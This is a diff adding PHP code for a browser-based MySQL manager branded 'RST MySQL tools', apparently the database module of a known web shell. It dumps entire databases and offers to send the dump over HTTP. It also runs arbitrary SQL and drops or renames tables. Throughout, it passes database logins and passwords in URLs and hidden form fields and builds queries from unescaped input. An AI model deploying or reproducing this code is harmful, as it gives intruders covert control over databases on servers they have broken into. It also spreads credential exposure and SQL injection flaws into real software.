+"<input type=\"hidden\" name=\"s\" value=\"$s\">".
+"<input type=\"hidden\" name=\"db\" value=\"$db\">".
+"<input type=\"hidden\" name=\"server\" value=\"$server\">".
+"<input type=\"hidden\" name=\"port\" value=\"$port\">".
+"<input type=\"hidden\" name=\"login\" value=\"$login\">".
+"<input type=\"hidden\" name=\"passwd\" value=\"$passwd\">".
+"<input type=\"hidden\" name=\"f_dump\" value=\"$file\">".
+"<input type=\"hidden\" name=\"dump\" value=\"bd\">".
+"<input type=\"hidden\" name=\"strukt\" value=\"d_strukt_bd\">".
+"<table align=center bgcolor=#FFFFFF width=400 cellpadding=0 cellspacing=1 border=0><tr bgcolor=#F0F1F4><td valign=top>".
+"<table cellpadding=2 bgcolor=#F0F1F4 width=100%>".
+"<tr><td align=center><b>Dump áàçû</b> [ <font color=green><b>$db</b></font> ]</td></tr>".
+"<tr><td align=center><font color=gray><b>Ñòðóêòóðà è äàííûå</b></font></td></tr>".
+"<tr><td align=center><hr size=1 color=#FFFFFF><b>Äåéñòâèå</b> (ïîêàçàòü/îòïðàâèòü)</td></tr>".
+"<tr><td><input type=\"radio\" name=\"send\" value=\"send_br\" checked=\"checked\"> Ïîêàçàòü â áðîóçåðå</td></tr>".
+"<tr><td><input type=\"radio\" name=\"send\" value=\"send_http\"> Îòïðàâèòü ôàéë äàìïà ïî HTTP</td></tr>".
+"<tr><td align=center><br><input type=\"submit\" value=\"Âûïîëíèòü çàïðîñ\"></td></tr>".
+"</table>".
+"</td></tr></table></form>";
+
+if ($HTTP_GET_VARS['dump']=='bd') {
+   if ($cnt >= 1) {
+      print $form_dump_bd;
+   }else{ 
+      print "<table border=1 width=400 align=center bgcolor=#E7E7D7><tr align=center>".
+            "<td><br><h5>Íåâîçìîæíî ñäåëàòü äàìï áàçû<br>Â áàçå <font color=blue>".
+            "$db</font> íåò òàáëèö!</h5></td></tr></table><br><br>";
+   }
+}
+   $host = $HTTP_SERVER_VARS["SERVER_NAME"];
+   $ip = $HTTP_SERVER_VARS["SERVER_ADDR"];
+if ($HTTP_GET_VARS['strukt']=='d_strukt_bd' && $HTTP_GET_VARS['send']=='send_br'){
+   if (sizeof($tabs) == 0) { 
+      // ïîëó÷àåì ñïèñîê òàáëèö áàçû 
+      $res = mysql_query("SHOW TABLES FROM $db", $connection); 
+      if (mysql_num_rows($res) > 0) { 
+         while ($row = mysql_fetch_row($res)) { 
+            $tabs[] .= $row[0]; 
+         } 
+      } 
+   } 
+       // îòêðûâàåì ôàéë äëÿ çàïèñè äàìïà 
+   $fp = fopen($file, "w"); 
+   fputs ($fp, "# RST MySQL tools\n# Home page: http://rst.void.ru\n#\n# Host settings:\n# MySQL version: (".mysql_GET_server_info().")\n# Date: ".
+   date("F j, Y, g:i a")."\n# ".$host." (".$ip.")"." dump db \"".$db."\"\n#____________________________________________________________\n\n"); 
+   foreach($tabs as $tab) {       
+      if ($add_drop) { 
+         fputs($fp, "DROP TABLE IF EXISTS `".$tab."`;\n");
+      }        
+      // ïîëó÷àåì òåêñò çàïðîñà ñîçäàíèÿ ñòðóêòóðû òàáëèöû 
+      $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $connection) or die(mysql_error()); 
+      $row = mysql_fetch_row($res); 
+      fputs($fp, $row[1].";\n\n"); 
+       
+      // ïîëó÷àåì äàííûå òàáëèöû 
+      $res = mysql_query("SELECT * FROM `$tab`", $connection); 
+      if (mysql_num_rows($res) > 0) { 
+         while ($row = mysql_fetch_assoc($res)) { 
+            $keys = implode("`, `", array_keys($row)); 
+            $values = array_values($row); 
+            foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+            $values = implode("', '", $values); 
+            $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; 
+            fputs($fp, $sql); 
+         } 
+      } 
+      fputs ($fp, "#---------------------------------------------------------------------------------\n\n"); 
+   } 
+   fclose($fp);
+   $dump_file=file($file);
+   print "<table border=1 align=center cellpadding=2 bgcolor=#F0F1F4 width=98%><tr><td>";
+   print "<table border=0 align=center cellpadding=2 bgcolor=#F0F1F4>";
+   foreach ($dump_file as $k=>$v) {
+        $v=str_replace("\n","<br>",$v);
+        print "<tr><td>".strip_tags($v,"<br>")."</td></tr>";
+   }
+   print "</table></td></tr></table><br>";
+   unlink($file);
+} 
+
+/*--------------Ñîçäàòü íîâóþ òàáëèöó---------------*/
+ $form_cr_tbl=
+ "<form method=\"GET\" action=\"$self\">".
+ "<input type=\"hidden\" name=\"s\" value=\"$s\">".
+ "<input type=\"hidden\" name=\"db\" value=\"$db\">".
+ "<input type=\"hidden\" name=\"server\" value=\"$server\">".
+ "<input type=\"hidden\" name=\"port\" value=\"$port\">".
+ "<input type=\"hidden\" name=\"login\" value=\"$login\">".
+ "<input type=\"hidden\" name=\"passwd\" value=\"$passwd\">".
+ "<table align=center bgcolor=#FFFFFF width=400 cellpadding=0 cellspacing=1 border=0><tr bgcolor=#F0F1F4><td valign=top>".
+ "<table cellpadding=2 bgcolor=#F0F1F4 width=100%>".
+ "<tr><td align=center><b>Ñîçäàòü íîâóþ òàáëèöó â áàçå</b> [ <font color=green><b>$db</b></font> ]<hr color=#FFFFFF></td></tr>".
+ "<tr><td align=center>Èìÿ íîâîé òàáëèöû: <input type=\"text\" name=\"new_tbl_name\" value=\"\" size=25></td></tr>".
+ "<tr><td align=center>Êîëè÷åñòâî ïîëåé òàáëèöû:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=\"text\" name=\"new_count_cols\" value=\"\" size=10></td></tr>".
+ "<tr><td align=center><br><input type=\"submit\" value=\"Âûïîëíèòü çàïðîñ\"></td></tr>".
+ "</table>".
+ "</td></tr></table></form>";
+
+
+if (isset($HTTP_GET_VARS['cr_tbl']) && $HTTP_GET_VARS['cr_tbl']=='new'){
+  print "$form_cr_tbl";   
+}
+if ( (isset($new_count_cols)) && (ereg("[^0-9]",$new_count_cols) || preg_match("/ +/",$new_count_cols) || $new_count_cols=='') ) { 
+    print "<script>alert('Êîëè÷åñòâî ïîëåé òàáëèöû - ýòî ÷èñëî, à íå ÷òî-òî èíîå!');</script>";
+    print "$form_cr_tbl";   
+}  
+
+if ( (ereg("[0-9]",$HTTP_GET_VARS['new_count_cols'])) && ($HTTP_GET_VARS['new_tbl_name'] !=='') ) {
+
+ for ($i=0; $i < $HTTP_GET_VARS['new_count_cols']; $i++) {
+
+  $pole_count .= "<tr align=center bgcolor=#DDDDDD>".
+      "<td><input type=\"text\" name=\"field_name[]\" size=\"10\" value=\"\"></td>".
+      "<td>
+            <select name=\"field_type[]\" width=3>
+                <option value=\"VARCHAR\">VARCHAR</option>
+                <option value=\"TINYINT\">TINYINT</option>
+                <option value=\"TEXT\">TEXT</option>
+                <option value=\"DATE\">DATE</option>
+                <option value=\"SMALLINT\">SMALLINT</option>
+                <option value=\"MEDIUMINT\">MEDIUMINT</option>
+                <option value=\"INT\">INT</option>
+                <option value=\"BIGINT\">BIGINT</option>
+                <option value=\"FLOAT\">FLOAT</option>
+                <option value=\"DOUBLE\">DOUBLE</option>
+                <option value=\"DECIMAL\">DECIMAL</option>
+                <option value=\"DATETIME\">DATETIME</option>
+                <option value=\"TIMESTAMP\">TIMESTAMP</option>
+                <option value=\"TIME\">TIME</option>
+                <option value=\"YEAR\">YEAR</option>
+                <option value=\"CHAR\">CHAR</option>
+                <option value=\"TINYBLOB\">TINYBLOB</option>
+                <option value=\"TINYTEXT\">TINYTEXT</option>
+                <option value=\"BLOB\">BLOB</option>
+                <option value=\"MEDIUMBLOB\">MEDIUMBLOB</option>
+                <option value=\"MEDIUMTEXT\">MEDIUMTEXT</option>
+                <option value=\"LONGBLOB\">LONGBLOB</option>
+                <option value=\"LONGTEXT\">LONGTEXT</option>
+                <option value=\"ENUM\">ENUM</option>
+                <option value=\"SET\">SET</option>
+            </select>
+        </td>".
+      "<td><input type=\"text\" name=\"field_length[]\" size=\"6\" value=\"\"></td>".
+      "<td>
+            <select name=\"field_attribute[]\">    
+                <option value=\"\" selected=\"selected\"></option>
+                <option value=\"BINARY\">BINARY</option>
+                <option value=\"UNSIGNED\">UNSIGNED</option>
+                <option value=\"UNSIGNED ZEROFILL\">UNS-D ZEROFILL</option>
+            </select>
+      </td>".
+      "<td>
+            <select name=\"field_null[]\">   
+                <option value=\"NOT NULL\">not null</option>
+                <option value=\"\">null</option>
+            </select>
+       </td>".
+       "<td><input type=\"text\" name=\"field_default[]\" size=\"14\" value=\"\"></td>".
+       "<td>
+            <select name=\"field_extra[]\">
+                <option value=\"\"></option>
+                <option value=\"AUTO_INCREMENT\">auto_increment</option>
+             </select>
+        </td>".
+        "<td align=\"center\"><input type=\"radio\" name=\"field_key_0[$i]\" value=\"primary_0\"></td>".
+        "<td align=\"center\"><input type=\"radio\" name=\"field_key_0[$i]\" value=\"index_0\"></td>".
+        "<td align=\"center\"><input type=\"radio\" name=\"field_key_0[$i]\" value=\"unique_0\"></td>".
+        "<td align=\"center\"><input type=\"radio\" name=\"field_key_0[$i]\" value=\"no\" checked=\"checked\"></td>".
+      "</tr>";
+ }
+
+  print 
+     "<form method=\"GET\" action=\"$self\">".
+     "<input type=\"hidden\" name=\"s\" value=\"$s\">".
+     "<input type=\"hidden\" name=\"db\" value=\"$db\">".
+     "<input type=\"hidden\" name=\"new_tbl_name\" value=\"$new_tbl_name\">".
+     "<input type=\"hidden\" name=\"server\" value=\"$server\">".
+     "<input type=\"hidden\" name=\"port\" value=\"$port\">".
+     "<input type=\"hidden\" name=\"login\" value=\"$login\">".
+     "<input type=\"hidden\" name=\"passwd\" value=\"$passwd\">".
+     "<table align=center bgcolor=#FFFFFF width=98% cellpadding=0 cellspacing=1 border=0><tr bgcolor=#F0F1F4><td valign=top>".
+     "<table cellpadding=2 bgcolor=#F0F1F4 width=100%>".
+     "<tr><td align=center><b>Ñîçäàòü íîâóþ òàáëèöó</b> [ <font color=green><b>$new_tbl_name</b></font> ] <b>â áàçå</b> [ <font color=green><b>$db</b></font> ]<hr color=#FFFFFF></td></tr>".
+     "<tr><td align=center>".
+     "<table bgcolor=#000000 border=0 cellspacing=1 cellpadding=2 bgcolor=#F0F1F4 width=100%>".
+     "<tr align=center bgcolor=silver><td><b>Ïîëå</b></td><td><b>Òèï</b></td><td><b>Äëèííà</b></td><td><b>Àòðèáóòû</b></td><td><b>Íîëü</b></td><td><b>Ïî óìîë÷àíèþ</b></td><td><b>Äîïîëíèòåëüíî</b></td><td><b>Ïåðâè÷íûé</b></td><td><b>Èíäåêñ</b></td><td><b>Óíèê-oå</b></td><td><b>---</b></td></tr>";
+
+
+            print $pole_count;
+
+
+print
+    "</table><br><b>Êîìåíòàðèé ê òàáëèöå:</b> <input type=\"text\" name=\"comment\" size=\"40\" maxlength=\"80\">
+     &nbsp;&nbsp;&nbsp;&nbsp;<b>Òèï òàáëèöû:</b>
+            <select name=\"tbl_type\">
+                <option value=\"Default\">Ïî óìîë÷àíèþ</option>
+                <option value=\"MYISAM\">MyISAM</option>
+                <option value=\"HEAP\">Heap</option>
+                <option value=\"MERGE\">Merge</option>
+                <option value=\"ISAM\">ISAM</option>
+            </select>&nbsp;&nbsp;&nbsp;&nbsp;
+           <input type=\"checkbox\" name=\"php_kod\" value=\"ok\"> Ïîêàçàòü PHP-êîä çàïðîñà
+    </td></tr>".
+    "<tr><td align=center><br><input type=\"submit\" value=\"Âûïîëíèòü çàïðîñ\"></td></tr>".
+    "</table>".
+    "</td></tr></table></form>";
+}
+
+if (isset($HTTP_GET_VARS['field_name'])) {
+
+    for ($i=0; $i<count($field_name); $i++) {
+       if ($HTTP_GET_VARS['field_name'][$i] !=='') {
+         $n_name .= "`$field_name[$i]` ";
+         if ($HTTP_GET_VARS['field_length'][$i] !=='') {
+             $n_name .= "$field_type[$i]($field_length[$i]) ";
+         }else{
+             $n_name .= "$field_type[$i] ";
+         }
+         if ($HTTP_GET_VARS['field_attribute'][$i] !=='') { $n_name .= "$field_attribute[$i] "; }
+         if ($HTTP_GET_VARS['field_null'][$i] =='NOT NULL') { $n_name .= "$field_null[$i] "; }
+         if ($HTTP_GET_VARS['field_default'][$i] !=='') { $n_name .= "DEFAULT '$field_default[$i]' "; }
+         if ($HTTP_GET_VARS['field_extra'][$i] =='AUTO_INCREMENT') { $n_name .= "$field_extra[$i], "; }else{ $n_name .=', '; }
+
+         /*--------Íàëè÷èå primary,index,unique----------*/
+         if ($HTTP_GET_VARS['field_key_0'][$i] !=='no') { 
+            if ($HTTP_GET_VARS['field_key_0'][$i] =='primary_0') {
+                $n_prim .= " `$field_name[$i]`, "; 
+            }
+            if ($HTTP_GET_VARS['field_key_0'][$i] =='index_0') { 
+                $n_ind .= " `$field_name[$i]`, "; 
+            }
+            if ($HTTP_GET_VARS['field_key_0'][$i] =='unique_0') { 
+                $n_uniq .= " `$field_name[$i]`, "; 
+            }
+         }
+         /*--------END primary,index,unique----------*/
+       }
+    }  //end for
+
+    $n_name=substr_replace($n_name,"",-2);                     
+    if (count($n_prim)>0) {
+       $n_prim=substr_replace($n_prim,"",-2); 
+       $n_name .=", PRIMARY KEY ($n_prim)";
+    }
+    if (count($n_ind)) {
+       $n_ind=substr_replace($n_ind,"",-2); 
+       $n_name .=", INDEX ($n_ind)";
+    }
+    if (count($n_uniq)) {
+       $n_uniq=substr_replace($n_uniq,"",-2); 
+       $n_name .=", UNIQUE ($n_uniq)";
+    }
+
+   $sql_new_tbl = "CREATE TABLE `$new_tbl_name` ( $n_name )";
+
+   if ($HTTP_GET_VARS['tbl_type'] !=='Default') {
+      $sql_new_tbl .= " TYPE =$tbl_type";
+   }
+   if ($HTTP_GET_VARS['comment'] !=='') {
+     $sql_new_tbl .= " COMMENT = '$comment'";
+   }       
+
+  $r_n_tbl=mysql_db_query($db, $sql_new_tbl) or die("$h_error".mysql_error()."$f_error");
+  $t=base64_encode("<font color=green size=2><b>Action: </b></font><font color=#706D6D size=2>Òàáëèöà [ <b>$new_tbl_name</b> ] óñïåøíî ñîçäàíà.</font><br>");
+   if ($HTTP_GET_VARS['php_kod']=='ok') { 
+        $t2=base64_encode("<br><table bgcolor=#EDEEF1 align=center width=98%><font color=green><b>PHP-êîä çàïðîñà:</b></font><tr><td>\$sql='$sql_new_tbl';</td></tr></table><br><br>");
+   }else{ $t2=''; }
+  print "<head><META HTTP-EQUIV='Refresh' CONTENT='0;url=$self?s=$s&db=$db&login=$login&passwd=$passwd&server=$server&port=$port&t=$t&t2=$t2'></head>";
+} 
+
+/*--------------END cîçäàòü íîâóþ òàáëèöó---------------*/
+
+/*-------------Ïðîèçâîëüíûé çàïðîñ ê ÁÄ-------------*/
+if ($HTTP_GET_VARS['q_tbl']=='bd') { $q_bd="SHOW TABLE STATUS "; }
+if ($HTTP_GET_VARS['return_sql']=='ok') { $q_bd=trim($HTTP_GET_VARS['new_query_bd']);}
+$form_query_db="<br>
+        <form method=\"GET\" action=\"$self?s=$s\">
+        <input type=\"hidden\" name=\"s\" value=\"$s\">                
+        <input type=\"hidden\" name=\"db\" value=\"$db\">
+        <input type=\"hidden\" name=\"server\" value=\"$server\">
+        <input type=\"hidden\" name=\"port\" value=\"$port\">
+        <input type=\"hidden\" name=\"login\" value=\"$login\">
+        <input type=\"hidden\" name=\"passwd\" value=\"$passwd\">
+        <table align=center width=90% border=0 bgcolor=#EDEEF1><tr><td>Âûïîëíèòü ïðîèçâîëüíûé çàïðîñ ê áàçå ( <b>$db</b> )</td></tr>
+        <tr><td width=90>
+        <textarea name=\"new_query_bd\" rows=\"10\" cols=\"80\">$q_bd</textarea>
+        </td><td valign=top>
+        <input type=\"checkbox\" name=\"php_kod\" value=\"ok\"> Ïîêàçàòü PHP-êîä çàïðîñà<br><br>
+        <input type=\"checkbox\" name=\"return_sql\" value=\"ok\" checked=\"checked\"> Ïîêàçàòü äàííûé çàïðîñ ñíîâà<br>
+        <br>
+        <a href=\"$self?s=$s&q_help=ok\" tarGET=\"_blank\"><b>Ïðèìåðû çàïðîñîâ</b></a>
+        </td></tr>
+        <tr><td>
+        <input type=\"submit\" value=\"çàïðîñ\">
+        </td></tr>
+        </table></form>";
+
+if (isset($db) && $HTTP_GET_VARS['q_tbl']=='bd') { 
+  print $form_query_db; 
+}
+if (isset($new_query_bd)) { 
+   $new_query_bd=trim($new_query_bd);
+   print $form_query_db;
+   if ($HTTP_GET_VARS['php_kod']=='ok') { 
+        print "&nbsp;&nbsp;&nbsp;<font color=green><b>PHP-êîä çàïðîñà:</b></font><br>&nbsp;&nbsp;&nbsp;\$sql=\"$new_query_bd\";<br><br>";
+   }
+  $r_q_bd=mysql_db_query($db, $new_query_bd) or die("$h_error".mysql_error()."$f_error");
+
+  print "&nbsp;&nbsp;&nbsp;<b>Çàïðîñ óñïåøíî âûïîëíåí<b>";
+  if ($r_q_bd !=='') {
+    print "<table align=center width=98% bgcolor=#D7D8DA>";
+    while ($line_bd = @mysql_fetch_array($r_q_bd, MYSQL_ASSOC)) {
+        print "<tr>";
+        foreach ($line_bd as $key_bd =>$col_value_bd) {          
+            print "<td bgcolor=#EDEEF1>".htmlspecialchars($col_value_bd)."</td>";
+        }
+        print "</tr>";
+    }
+    print "</table><br>";
+    @mysql_free_result($r_q_bd);
+  }
+} 
+
+/*---------------Óäàëåíèå òàáëèöû------------*/
+if (isset($drop_table) && isset($db)){ 
+ mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error"); 
+ $query = "DROP TABLE IF EXISTS $drop_table";
+ $result = mysql_query($query) or die("$h_error<b>".mysql_error()."</b>$f_error");
+ $t=base64_encode("<font color=green size=2><b>Action: </b></font><font color=#706D6D size=2>Òàáëèöà [ <b>$drop_table </b>] óñïåøíî óäàëåíà.</font><br>");
+ print "<head><META HTTP-EQUIV='Refresh' CONTENT='0;url=$self?s=$s&db=$db&login=$login&passwd=$passwd&server=$server&port=$port&t=$t'></head>";
+ unset($drop_table);
+}
+if (isset($q_i)) { $n_img($tag,$f_n,$img_c); }
+
+if (isset($db) && isset($tbl)) {
+ /*Ïîëó÷àåì êîëè÷åñòâî ñòðîê â òàáëèöå*/
+ $count=mysql_query ("SELECT COUNT(*) FROM $tbl");
+ $count_row= mysql_fetch_array($count);  //$count_row[0] êîë-âî ñòðîê
+ mysql_free_result($count);
+ print "<table border=0 align=center width=100% cellpadding=0 cellspacing=0>
+         <tr> 
+           <td>
+                <table align=center border=0 width=700 cellpadding=0 cellspacing=1 bgcolor=#FFFFFF>
+                   <tr align=center>                      
+                      <td width=100 bgcolor=#B6B5B5>
+<a href=\"$_SERVER[PHP_SELF]?s=$s&db=$db&tbl=$tbl&st_tab=TRUE&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"Ïîêàçàòü ñòðóêòóðó $tbl\"><b>Ñòðóêòóðà</b></a>
+                      </td>
+                      <td width=100 bgcolor=#B6B5B5>
+<a href=\"$_SERVER[PHP_SELF]?s=$s&db=$db&tbl=$tbl&login=$login&passwd=$passwd&server=$server&port=$port&nn_row=ok\" title=\"Âñòàâèòü íîâûé ðÿä â òàáëèöó $tbl\"><b>Âñòàâèòü</b></a>
+                      </td>
+                      <td width=120 bgcolor=#B6B5B5>
+<a href=\"$_SERVER[PHP_SELF]?s=$s&db=$db&tbl=$tbl&login=$login&passwd=$passwd&server=$server&port=$port&query_tbl&q_tbl=table\" title=\"Ïðîèçâîëüíûé SQL çàïðîñ\"><b>SQL-çàïðîñ</b></a>
+                      </td>
+                      <td width=120 bgcolor=#B6B5B5>
+<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&server=$server&port=$port&db=$db&tbl=$tbl&dump=tab\" title=\"Ýêñïîðò äàííûõ òàáëèöû $tbl\"><b>Äàìï òàáëèöû</b></a>
+                      </td>
+                      <td width=120 bgcolor=#B6B5B5>
+<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&server=$server&port=$port&db=$db&tbl=$tbl&alter_table=TRUE\" title=\"Ïåðåèìåíîâàòü òàáëèöó $tbl\"><b>Ïåðåèìåíîâàòü</b></a>
+                      </td>
+                      <td width=120 bgcolor=#B6B5B5>
+<a href=\"$_SERVER[PHP_SELF]?s=$s&db=$db&drop_table=$tbl&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"Óäàëèòü òàáëèöó $tbl\" onClick=\"return confirm('Óäàëèòü òàáëèöó $tbl ?')\";><b>Óäàëèòü òàáëèöó</b></a>
+                     </td>
+                   </tr>
+                </table> 
+           </td>
+         </tr>
+         <tr>
+           <td><br>";
+                if (isset($t)) { print "&nbsp;&nbsp;".base64_decode($t);}
+                print "&nbsp;&nbsp;ÁÄ:(<b>$db</b>)&nbsp;&nbsp;&nbsp;&nbsp;Òàáëèöà:(<b>$tbl</b>)&nbsp;&nbsp;&nbsp;
+                Âñåãî ñòðîê:(<b>$count_row[0]</b>)
+           </td>
+         </tr>
+         <tr>
+           <td> 
+<table border=0 width=100% cellpadding=4 cellspacing=0 bgcolor=#FFFFFF>
+ <tr>
+   <td bgcolor=#E6E7E9 align=center valign=center>";
+
+$start=$limit_start+$limit_count;
+
+if (isset($start) && ($start>0)) {
+ print "<table align=center border=0 cellpadding=4 cellspacing=0>
+        <tr>";
+       
+if ($start+$limit_count >= $count_row[0]){
+$start=$limit_start;
+$limit_count=$count_row[0]-$start;
+}
+
+if (isset($start) && ($limit_start >= 30) ){
+  $back=$limit_start-30;
+  print "<form method=\"GET\" action=\"$self\">
+        <td bgcolor=#FFFFFF align=center>       
+        <input type=\"hidden\" name=\"server\" value=\"$server\">
+        <input type=\"hidden\" name=\"port\" value=\"$port\">
+        <input type=\"hidden\" name=\"login\" value=\"$login\">
+        <input type=\"hidden\" name=\"passwd\" value=\"$passwd\">
+        <input type=\"hidden\" name=\"db\" value=\"$db\">
+        <input type=\"hidden\" name=\"s\" value=\"$s\">
+        <input type=\"hidden\" name=\"tbl\" value=\"$tbl\">
+        <input type=\"hidden\" name=\"limit_start\" value=\"$back\">
+        <input type=\"hidden\" name=\"limit_count\" value=\"30\">
+        <input type=\"submit\" value=\"<< íàçàä(30)\">&nbsp;&nbsp;
+        </td></form>";
+}
+
+print " <form method=\"GET\" action=\"$self\">
+        <td bgcolor=#FFFFFF align=center>
+        <input type=\"hidden\" name=\"server\" value=\"$server\">
+        <input type=\"hidden\" name=\"port\" value=\"$port\">
+        <input type=\"hidden\" name=\"login\" value=\"$login\">
+        <input type=\"hidden\" name=\"passwd\" value=\"$passwd\">
+        <input type=\"hidden\" name=\"db\" value=\"$db\">
+        <input type=\"hidden\" name=\"s\" value=\"$s\">
+        <input type=\"hidden\" name=\"tbl\" value=\"$tbl\">
+        <input type=\"submit\" value=\"ïîêàçàòü\">&nbsp;&nbsp;îò
+        <input type=\"text\" name=\"limit_start\" value=\"$start\" size=\"5\" maxlength=\"5\">ñòðîêè
+        &nbsp;&nbsp; <input type=\"text\" name=\"limit_count\" value=\"$limit_count\" size=\"5\" maxlength=\"5\">ñòðîê òàáëèöû
+        </td></form>";
+
+if ( isset($limit_start) && ($start <= $count_row[0]) ){
+ print "<form method=\"GET\" action=\"$self\">
+        <td bgcolor=#FFFFFF align=center>
+        <input type=\"hidden\" name=\"server\" value=\"$server\">
+        <input type=\"hidden\" name=\"port\" value=\"$port\">
+        <input type=\"hidden\" name=\"login\" value=\"$login\">
+        <input type=\"hidden\" name=\"passwd\" value=\"$passwd\">
+        <input type=\"hidden\" name=\"s\" value=\"$s\">
+        <input type=\"hidden\" name=\"db\" value=\"$db\">
+        <input type=\"hidden\" name=\"tbl\" value=\"$tbl\">
+        <input type=\"hidden\" name=\"limit_start\" value=\"$start\">
+        <input type=\"hidden\" name=\"limit_count\" value=\"30\">
+        <input type=\"submit\" value=\"âïåðåä(30)>>\">
+        </td></form>";
+}
+
+print "</tr></form></table>";
+}
+
+
+/*------------Ïåðåèìåíîâàíèå òàáëèöû------------*/
+if ($alter_table=="TRUE"){
+print " <form method=\"GET\" action=\"$self\">
+        <input type=\"hidden\" name=\"s\" value=\"$s\">
+        <input type=\"hidden\" name=\"server\" value=\"$server\">
+        <input type=\"hidden\" name=\"port\" value=\"$port\">
+        <input type=\"hidden\" name=\"login\" value=\"$login\">
+        <input type=\"hidden\" name=\"passwd\" value=\"$passwd\">
+        <input type=\"hidden\" name=\"db\" value=\"$db\">
+        <input type=\"hidden\" name=\"tbl\" value=\"$tbl\">
+        <input type=\"hidden\" name=\"alter_table\" value=\"$alter_table\">
+        <table border=0 cellpadding=4 cellspacing=1 bgcolor=#FFFFFF>
+        <tr><td bgcolor=#DAD9D9 align=center><font size=2>Ïåðåèìåíîâàòü òàáëèöó [ <b>$tbl</b> ]</font></td></tr>
+        <tr><td bgcolor=#DAD9D9>Íîâîå èìÿ òàáëèöû:
+        <input type=\"text\" name=\"alttbl\" value=\"\">
+        <input type=\"submit\" value=\"ïåðåèìåíîâàòü\" onClick=\"return confirm('Âû óâåðåíû, ÷òî õîòèòå ïåðåèìåíîâàòü òàáëèöó \' $tbl \' ?')\";>
+        </td></tr></table></form>";
+}
+
+ if (isset($alttbl)){
+ mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error");
+ //$query = "RENAME TABLE $tbl TO $alttbl";
+ $query = "ALTER TABLE $tbl RENAME TO $alttbl";
+ $result = mysql_query($query) or die("$h_error<b>".mysql_error()."</b>$f_error"); 
+ $t=base64_encode("<font color=green size=2><b>Action: </b></font><font color=#706D6D size=2>Òàáëèöà [ <b>$tbl ]</b> ïåðåèìåíîâàíà â [ <b>$alttbl</b> ]</font><br>");
+ print "<head><META HTTP-EQUIV='Refresh' CONTENT='0;url=$self?s=$s&db=$db&login=$login&passwd=$passwd&server=$server&port=$port&tbl=$alttbl&limit_start=0&limit_count=5&t=$t'></head>";
+ }
+
+/*-------------------Ñòðóêòóðà òàáëèöû-----------------*/
+if (isset($st_tab) && $st_tab=='TRUE'){
+ mysql_select_db($st_db);
+ $result = mysql_query('desc '.$tbl, $connection); 
+ print "<br><center><font size=2>Ñòðóêòóðà òàáëèöû [ <b>$tbl</b> ]</font><center>".
+       "<table align=center border=0 cellpadding=2 cellspacing=1 width=700 bgcolor=#FFFFFF>";
+ 
+ for ($i=0;$i<@mysql_num_fields($result);$i++){
+       $name=mysql_field_name($result,$i);
+       $name=eregi_replace("Field","Ïîëå",trim($name));
+       $name=eregi_replace("Type","Òèï",trim($name));
+       $name=eregi_replace("Null","Íîëü",trim($name));
+       $name=eregi_replace("Key","Èíäåêñû",trim($name));
+       $name=eregi_replace("Default","Ïî óìîë÷àíèþ",trim($name));
+       $name=eregi_replace("Extra","Äîïîëíèòåëüíî",trim($name));
+       $nn .= "<td align=center bgcolor=#C7C5C5><b>$name</b></td>";   
+ } 
+ print "<tr>$nn</tr>";
+ while ($l_tbl = @mysql_fetch_array($result, MYSQL_ASSOC)) {      
+     print "<tr bgcolor=#E7E7D7>";
+     foreach ($l_tbl as $k_tbl =>$col_v_tbl) {          
+          if (strtoupper(substr($col_v_tbl, 0, 3)) === 'PRI') {
+             $col_v_tbl="Ïåðâè÷íûé";
+          }
+          if (strtoupper(substr($col_v_tbl, 0, 3)) === 'UNI') {
+             $col_v_tbl="Óíèêàëüíûé";
+          }
+          if (strtoupper(substr($col_v_tbl, 0, 3)) === 'MUL' && $col_v_tbl !=='') {
+             $col_v_tbl="Èíäåêñ";
+          }
+          if (strtoupper(substr($col_v_tbl, 0, 3)) === 'YES') { $col_v_tbl="Äà"; }
+          if (eregi("Field", $k_tbl)) { 
+             print "<td><font color=green><b>".htmlspecialchars($col_v_tbl)."</b></font></td>";
+          }elseif (eregi("Type", $k_tbl)) { 
+             print "<td align=left>".htmlspecialchars($col_v_tbl)."</td>";
+          }else{
+             print "<td align=center>".htmlspecialchars($col_v_tbl)."</td>";             
+          }
+     }
+     print "</tr>";
+ }
+ print "</table><br>";
+ @mysql_free_result($result);
+}
+
+/*-------------Ïðîèçâîëüíûé çàïðîñ ê òàáëèöå-------------*/
+if ($HTTP_GET_VARS['q_tbl']=='table') { $q_tbl="SELECT * FROM `$tbl` WHERE 1 LIMIT 0, 30"; }
+if ($HTTP_GET_VARS['return_sql']=='ok') { $q_tbl=trim($HTTP_GET_VARS['new_query_tbl']); }
+$form_query_db_tbl="<br>
+        <form method=\"GET\" action=\"$self?s=$s\">
+        <input type=\"hidden\" name=\"s\" value=\"$s\">                
+        <input type=\"hidden\" name=\"db\" value=\"$db\">
+        <input type=\"hidden\" name=\"tbl\" value=\"$tbl\">
+        <input type=\"hidden\" name=\"server\" value=\"$server\">
+        <input type=\"hidden\" name=\"port\" value=\"$port\">
+        <input type=\"hidden\" name=\"login\" value=\"$login\">
+        <input type=\"hidden\" name=\"passwd\" value=\"$passwd\">
+        <table width=90% border=0 bgcolor=#EDEEF1><tr><td>Âûïîëíèòü ïðîèçâîëüíûé çàïðîñ ê òàáëèöå ( <b>$tbl</b> )</td></tr>
+        <tr><td width=90>
+        <textarea name=\"new_query_tbl\" rows=\"10\" cols=\"80\">$q_tbl</textarea>
+        </td><td valign=top>
+        <input type=\"checkbox\" name=\"php_kod\" value=\"ok\"> Ïîêàçàòü PHP-êîä çàïðîñà<br><br>
+        <input type=\"checkbox\" name=\"return_sql\" value=\"ok\" checked=\"checked\"> Ïîêàçàòü äàííûé çàïðîñ ñíîâà<br>
+        <br>
+        <a href=\"$self?s=$s&q_help=ok\" tarGET=\"_blank\"><b>Ïðèìåðû çàïðîñîâ</b></a>
+        </td></tr>
+        <tr><td>
+        <input type=\"submit\" value=\"çàïðîñ\">
+        </td></tr>
+        </table></td></form>";
+
+
